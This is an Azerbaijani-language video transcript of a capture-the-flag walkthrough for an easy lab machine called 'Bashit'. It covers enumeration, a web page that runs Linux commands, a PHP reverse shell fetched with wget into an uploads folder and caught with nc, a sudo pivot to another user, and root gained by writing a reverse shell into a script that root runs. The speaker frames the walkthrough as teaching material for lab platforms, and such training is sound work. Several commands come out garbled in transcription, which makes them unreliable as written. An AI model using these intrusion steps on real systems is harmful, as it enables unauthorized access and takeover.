Salam dostlar, bu günləri biz Hexabox Bashit maşını haqqında danışacağıq və həmişə olduğu kimi necə deyirik? Biz istifadə etdiyimiz texnik və texnologiyalar yalnız etik hacking, etik kiber təhlükəsizlik üçün nəzərdə tutulub. İstifadə olunan texnika və texnologiyalar yalnız TryHackMe və Hexabox üçün nəzərdə tutulub. Digər maşınlarda istifadə edilməsi qəti qadağandır. İndi isə başlayaq. İlk öncə biz Nmap ilə onsuz da bir dəfə araşdırmışıq. Bu IP-ni elə də qeyri-adi bir məlumat əldə edə bilmədik. Növbəti. Mən qısa yolları yazmışam. Yəni biz bəzən olur izləyicilər deyir ki, copy paste ilə başqa heç nə görmürük. Yəni bu maşını enumeration etmək müəyyən bir vaxt tələb edib. Mən burada dev adlı, yəni maşının IP-si və dev yazanda bizə 2 dənə PHP fayl verir. Hər ikisi eyni şeyi göstərir əslində. Sadəcə tıkladıq. Burada görürük ki, fikir verin, Linux komandasına oxşayır. Linux bir komanda veririk və görürük ki, görürük ki, artıq biz burada Linux komandalarını yerinə yetirə bilirik. Əgər biz Linux komandalarını yerinə yetirə biliriksə, biz bura shell də əlavə edə bilərik. Shell üçün nə edirik? Mən artıq reverse shell etmişəm. Nə cür edilir, necə edilir digər köhnə videolarda var. Baxsaz, görsəniz öyrənəcəksiniz əlbəttə ki. Sadəcə olaraq Python server qaldırıram, simple server. Və ilk hansı direktoriyadayıqsa, hatta dev direktoriyasında wget http 14.8.2.1.2.3.4/shell.php edirik. Yazır ki, cannot write to success. Yəni ki, biz bu qovluğu heç nə edə bilmərik. Amma belə olanda həmişə baxın görün digər hansı qovluqlar var. Fikir verin, uploads var. Demək ki, biz faylları uploads eləməliyik. cg nöqtə eləyəndən sonra ls edirik. Burada uploads var. cg uploads yazırıq. cg uploads. Okay. Biz artıq shell-i, yəni mən qoymuşam, belə deyək, bu komandayla. İndi mənə lazım olacaq ki, bu komandanı yerinə yetirək, aktivləşdirək. Biz nə edirik? Biz hər ikisini dayandırırıq. nc 1, 2, 3, 4 etdik. Biz burada nə etməliyik? Yazmalıyıq. Uploads. Okay. Uploads. Shell. Və biz maşındayıq. Who am I? ls pwd. Biz komandaları yerinə yetirə bilirik. Sizə home'a giririk. ls. Yazılıb burada. Rxl var, script manager var. Biz script manageri GitOfBeans'dən də belə deyək. Sadəcə yazaq da görək, varmı belə bir şey? Bu nədir? Əgər varsa. Prinsipə çıxmayacaq. Mən nə cür tapdım? Sadəcə Google'da script manager Ubuntu yazdım. Mənə belə bir script verdi. Yəni bu sətri verdi. Amma bundan qabaq biz nə edirik? Biz bunu edirik. Okay. sudo-l yaza bilərik. Fikir verdiniz. Yazdı. Biz deməli copy paste edək. Bir də yazaq. Niyə çıxmadı? Qəribədir. Binary. Amma faktiki olaraq mən buradan götürmüşdüm. Yəni bu yazını mən GitOfBeans'dən götürmüşəm, amma nədənsə bu indi yoxdur. Qəribədir. Yazan kimi avtomatik olaraq user'ı keçir. Mən artıq script manager. Nəyə görə script manager etdim? Onun haqqında danışaq. Mən LintPS SH aktivləşdirəndə bizim hədəf maşınımızda məndə sadəcə göstərdi ki,
CD scripts. Tak. Ha, CD. Okay. Burada 2 dənə script haqqında mənə məlumat verdi. Və məndə nə nəzərdə tutulur? Bu qovluqda, yəni Lin.sh haqqında çox geniş bir video olacaq. Yəni bu əslində olub bir dəfə. Linux Privilege Escalation haqqında məlumat var, video. 50 dəqiqəlik. Siz ona baxsanız, orada çox bir məlumatlar var və onu təzədən izah eləmək mənim üçün vaxt itkisi olacaq. Amma siz onu oturub baxmalısınız. Deməli, Lin.sh ilə biz artıq bunu enumeration etmişik və bu iki belə çox maraqlı bir fayl nəzərdə tutulur. cattest.py yazanda bir skripti cat text.txt-də, aha. Burada da heç nə yoxdur. Okay. Clear eləsək, yox, bu komandanı yerinə yetirmir. Deməli, bunu biz enumerate etməkdən ötürü ikinci reverse shell istifadə edirik. Və bunu. Nə cürdür? Biz bu maşında indi Nano ilə və yaxud da ki Vim ilə fayl yaradıb bunu içinə yerləşdirə bilməyəndə, hansı ki olmur, hər dəfə eləyəndə o maşından atır deyə mən artıq tətbiq etmirəm. Bizim Linuxda belə bir komandamız var, echo. Echo dırnaq içərisində biz öz skriptimizi yazırıq və exploit.py faylına yönləndiririk. İndi biz bunu eləyəcəyik. Biz belə eləyək də. NC burada 5 yazırıq. Çünki bizim burada list portumuz 1 2 3 4 5'dir. Aha. Biz bunu götürürük. Okay, kopya edirik. Bunu aktivləşdirək. Bir müddət gözləyəsi olacaq deyəsən. Yaxud da ki bir də. Aha, qoşuldu. Biz olduq root. Bu əma etsək, okey, biz rootuq. Deməli biz həm user, həm də rootun skriptini əldə etmiş olduq. Bu easy maşını olduğuna görə hardasa 7-10 dəqiqə çəkdi videonun çəkilişi. Amma yeni başlayanlar 1 saata qədər vaxt apara bilər. Əgər siz yəni lap başlayanlar, yəni heç nə xəbəri olmayanlar skript kit səviyyəsində maksimum siz maşına daxil ola biləcəksiniz. Amma Lin.ps-dan ən azı Linux Privilege Escalation-a baxmısınızsa, yəni siz rahatlıqla istifadə edə biləcəksiniz. Yenə deyirəm, bütün bu videolar sırf tədris üçün nəzərdə tutulub, digər maşınlarda istifadəsi qəti qadağandır. Əgər videolarımız sizi hər hansı bir sahə üçün köməklik edə bilirsə, bəyənin, komment yazın, dostlarınızla paylaşmağı unutmayın. Hamınıza uğurlar.